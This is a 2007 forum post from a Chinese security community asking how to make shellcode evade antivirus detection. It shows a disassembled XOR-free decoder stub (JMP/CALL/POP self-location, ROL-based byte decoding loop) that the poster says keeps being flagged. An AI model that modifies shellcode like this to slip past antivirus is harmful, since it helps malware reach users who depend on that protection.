-
-
shellcode免杀,贵求大师帮忙!
-
发表于:
2007-2-27 15:29
4270
-
004CDC00 > /EB 0D JMP SHORT 复件BsDe.004CDC0F
004CDC02 /$ |5F POP EDI
004CDC03 |. |57 PUSH EDI
004CDC04 |. |8BF7 MOV ESI,EDI
004CDC06 |> |AC LODS BYTE PTR DS:[ESI]
004CDC07 |. |C0C0 04 ROL AL,4
004CDC0A |. |AA STOS BYTE PTR ES:[EDI]
004CDC0B |. |49 DEC ECX
004CDC0C |.^|75 F8 JNZ SHORT 复件BsDe.004CDC06
004CDC0E \. |C3 RETN
004CDC0F > \E8 EEFFFFFF CALL 复件BsDe.004CDC02
004CDC14 . 55 PUSH EBP
004CDC15 . B8 CE18CEC8 MOV EAX,C8CE18CE
004CDC1A . 0000 ADD BYTE PTR DS:[EAX],AL
这段shellcode的前0x13个字节连续两次被杀,第一次将edi和esi调换一次。
请问现在该怎么改?谢谢大家!
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!